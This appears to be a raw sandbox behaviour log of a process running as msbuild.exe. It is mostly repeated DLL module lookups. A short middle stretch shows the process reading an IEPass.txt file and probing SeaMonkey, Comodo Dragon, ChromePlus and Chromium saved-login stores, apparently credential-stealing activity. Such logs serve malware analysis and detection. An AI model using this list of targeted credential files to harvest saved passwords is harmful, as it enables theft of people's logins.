Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Unmap - True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_attributes True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, type = file_type True 2
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, size = 4096, size_out = 389 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\IEPass.txt, size = 4096, size_out = 0 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Comodo\Dragon\User Data\Default\Login Data, type = file_attributes False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data, type = file_attributes False 1
File Get Info filename = C:\Chromium\User Data\Default\Login Data, type = file_attributes False 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\Mails.txt, type = file_attributes False 1
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Module Get Filename module_name = private_0x0000000000400000, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\advapi32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\syswow64\user32.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\CRYPTSP.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rsaenh.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\bcrypt.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\RpcRtRemote.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CLBCatQ.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\OLEAUT32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemdisp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbemcomn.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\WS2_32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\NSI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wmiutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\wbemsvc.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\wbem\fastprox.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\NTDSAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\SXS.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\CustomMarshalers\bf7e7494e75e32979c7824a07570a8a9\CustomMarshalers.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll, size = 2048 True 1
Module Get Filename module_name = c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll, process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dwmapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasapi32.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasman.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rtutils.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\mswsock.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wshtcpip.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\wship6.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\winhttp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\webio.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\IPHLPAPI.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\WINNSI.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 1
Module Get Filename process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 1
